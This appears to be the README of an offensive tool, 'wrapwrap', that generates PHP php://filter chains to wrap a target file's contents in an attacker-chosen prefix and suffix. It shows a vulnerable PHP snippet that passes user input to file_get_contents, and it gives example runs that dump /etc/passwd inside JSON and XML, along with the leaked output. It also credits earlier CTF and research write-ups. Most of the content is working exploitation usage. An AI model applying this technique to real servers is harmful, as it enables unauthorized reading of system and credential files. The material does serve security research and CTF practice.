Generates a php://filter chain that adds a prefix and a suffix to the contents of a file.
Refer to our blogpost for details about the implementation.
If you want to contribute, the main python file contains a few TODOs which should not be hard to implement.
Say you have code like so:
$data = file_get_contents($_POST['url']);
$data = json_decode($data);
echo $data->message;To obtain the contents of some file, we'd like to have: {"message":"<file contents>"}. This can be done using:
$ ./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
[*] Dumping 1008 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=705031).This yields:
{"message":"root:x:0:0:root:/root:/bin/bash=0Adaemon:..."}If some PHP code parses an arbitrary XML and displays the contents of the <name> tag, we'd like something like: <root><name>[file contents]</name></root>. As a result, we'd use:
$ ./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000
[*] Dumping 1008 bytes from /etc/passwd.
[+] Wrote filter chain to chain.txt (size=709871).This produces:
<root><name>root:x:0:0:root:/root:/bin/bash=0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=0Abin:x:...</name></root>As mentioned in the blogpost, this tool could not have been made without the previous work of other people such as (but not limited to):
- Surprising CTF task solution using php://filter by gynvael
- Solving "includer's revenge" from hxp ctf 2021 without controlling any files by loknop
- PHP filters chain: what is it and how to use it by remsio
- DownUnderCTF 2022 minimal-php solution and write up by hash_kitten
- PHP filters chain: file read from error based oracle by remsio